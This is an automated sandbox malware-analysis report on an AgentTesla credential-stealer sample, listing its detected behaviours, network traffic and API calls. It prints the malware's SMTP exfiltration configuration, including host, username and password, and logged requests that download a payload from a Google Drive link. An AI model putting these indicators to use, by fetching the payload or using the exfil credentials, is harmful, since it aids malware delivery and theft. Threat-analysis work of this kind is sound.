Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3Pd480eWHA.exe

Overview

General Information

Sample name:3Pd480eWHA.exe
renamed because original name is a hash value
Original sample name:0c2b883b2bff3ab75adf1d79049fffe5de810c19cb65e1b3a4e14d73ca10598c.exe
Analysis ID:1550181
MD5:c91d3b24dd89ae81099db451a512ba38
SHA1:9d69cf3aafd3743216ea9d3777be0e2528c9b6ce
SHA256:0c2b883b2bff3ab75adf1d79049fffe5de810c19cb65e1b3a4e14d73ca10598c
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
AI detected suspicious sample
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 3Pd480eWHA.exe (PID: 760 cmdline: "C:\Users\user\Desktop\3Pd480eWHA.exe" MD5: C91D3B24DD89AE81099DB451A512BA38)
    • 3Pd480eWHA.exe (PID: 3260 cmdline: "C:\Users\user\Desktop\3Pd480eWHA.exe" MD5: C91D3B24DD89AE81099DB451A512BA38)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.2521682008.0000000035841000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.2521682008.0000000035841000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: 3Pd480eWHA.exe PID: 3260JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 67.23.226.139, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\3Pd480eWHA.exe, Initiated: true, ProcessId: 3260, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49977
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T15:06:21.524123+010020229301A Network Trojan was detected52.149.20.212443192.168.2.749740TCP
            2024-11-06T15:07:01.749231+010020229301A Network Trojan was detected20.12.23.50443192.168.2.749956TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T15:07:14.059270+010028032702Potentially Bad Traffic192.168.2.749974172.217.16.206443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 3Pd480eWHA.exe.760.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
            Source: 3Pd480eWHA.exeReversingLabs: Detection: 55%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 3Pd480eWHA.exeJoe Sandbox ML: detected
            Source: 3Pd480eWHA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49975 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49976 version: TLS 1.2
            Source: 3Pd480eWHA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00406010 FindFirstFileA,FindClose,9_2_00406010
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00402688 FindFirstFileA,9_2_00402688
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_004055AE DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_004055AE
            Source: global trafficTCP traffic: 192.168.2.7:49977 -> 67.23.226.139:587
            Source: Joe Sandbox ViewIP Address: 67.23.226.139 67.23.226.139
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49740
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49956
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49974 -> 172.217.16.206:443
            Source: global trafficTCP traffic: 192.168.2.7:49977 -> 67.23.226.139:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: mail.showpiece.trillennium.biz
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.showpiece.trillennium.biz
            Source: 3Pd480eWHA.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: 3Pd480eWHA.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.00000000357F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://showpiece.trillennium.biz
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.00000000357F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.00000000357F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521682008.00000000357F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: 3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/.
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2501147074.0000000006E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.00000000052B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHaB
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.00000000052CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 3Pd480eWHA.exe, 00000009.00000003.1980141600.00000000052E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.2011831412.00000000052DF000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa&export=download
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.00000000052CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa&export=download2
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.00000000052B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ivMM0-XwID-PbjTfWX2zUc3ft-ythcHa&export=download3
            Source: 3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
            Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49975 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49976 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\3Pd480eWHA.exeJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_00405063 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405063
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00403123 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_00403123
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_004048A20_2_004048A2
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_004048A29_2_004048A2
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_0011E2899_2_0011E289
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_0011A5009_2_0011A500
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_0011A9509_2_0011A950
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00114A989_2_00114A98
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00113E809_2_00113E80
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_001141C89_2_001141C8
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C31089_2_389C3108
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C66989_2_389C6698
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389CB2BA9_2_389CB2BA
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389CC2209_2_389CC220
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C7E209_2_389C7E20
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C56489_2_389C5648
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389CE4409_2_389CE440
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C00409_2_389C0040
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C5D839_2_389C5D83
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C23389_2_389C2338
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C77409_2_389C7740
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_38EA19889_2_38EA1988
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_39004B489_2_39004B48
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_390004489_2_39000448
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C00069_2_389C0006
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_389C00379_2_389C0037
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: String function: 00402A3A appears 52 times
            Source: 3Pd480eWHA.exeStatic PE information: invalid certificate
            Source: 3Pd480eWHA.exe, 00000009.00000002.2521643699.00000000356E9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 3Pd480eWHA.exe
            Source: 3Pd480eWHA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/11@4/4
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00403123 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_00403123
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_0040432F GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040432F
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile created: C:\Users\user\AppData\Local\demarkeredeJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeMutant created: NULL
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsm111C.tmpJump to behavior
            Source: 3Pd480eWHA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 3Pd480eWHA.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile read: C:\Users\user\Desktop\3Pd480eWHA.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\3Pd480eWHA.exe "C:\Users\user\Desktop\3Pd480eWHA.exe"
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess created: C:\Users\user\Desktop\3Pd480eWHA.exe "C:\Users\user\Desktop\3Pd480eWHA.exe"
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess created: C:\Users\user\Desktop\3Pd480eWHA.exe "C:\Users\user\Desktop\3Pd480eWHA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wininet.dllJump to behavior
